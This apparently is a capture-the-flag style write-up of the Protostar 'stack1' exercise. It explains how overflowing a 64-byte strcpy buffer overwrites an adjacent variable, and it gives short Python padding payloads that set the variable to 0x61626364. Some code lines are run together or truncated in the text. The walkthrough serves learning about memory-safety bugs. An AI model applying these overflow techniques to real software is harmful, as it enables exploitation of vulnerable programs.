The goal of this challenge is to overflow a buffer to modify the “modified” variable value to “0x61626364” and print the winning statement.
Things to note
modified = 0: So the “modified” variable is hardcoded to 0.
strcpy(buffer, argv);: This is the vulnerable func of this program. It will copy the user supplied strings to a pointer; however, if the strings are bigger than the set buffer which is 64 bytes in this case (
char buffer;), the BOF will happen.
When we enter a random string like “bigb0ss,” we get the following output = 0x00000000:
So, what is going on? Let’s look at the source code once again. Basically, what it does is it checks if the “modified” value is “0x61626364” and if not it just prints out the current value of the “modified” variable, which is obviously 0.
But since we know that the buffer limit is 64 bytes, when we supply 70 “A”s, we get the following output:
So “0x41” is a capital “A” in the ASCII representation. By supplying more bytes than the buffer size, we can see that the “modified” value is overwritten. Next task is simple: (1) find the offset; (2) offset + overwrite “modified” value with “0x61626364.”
Let’s create the following exploit with python:
[Exploit-1]#!/usr/bin/pythonpadding = "A" * 60 # Giving 60 padding
padding+= "BBBBCCCCDDDDEEEEFFFF" # Using different letters
When we run this against the
stack1 program, we now see the “modified” value is overwritten with “0x43434343” (“0x43 = C).
Now we know that by switching “CCCC” with our target value (“0x61626364”), we can print out the winning statement. Before that let’s convert those hex value to the ASCII characters. We can do this with python.
[Exploit-2]#!/usr/bin/pythonpadding = "A" * 64 # Offset (60 + BBBB)
padding+= "dcba" # Replacing "CCCC" with "dcba"
# (Little-endian format)
When it’s run, we get the winning statement!
Thanks for reading!
- Stack 2 — Stack-based BOF: Basic 2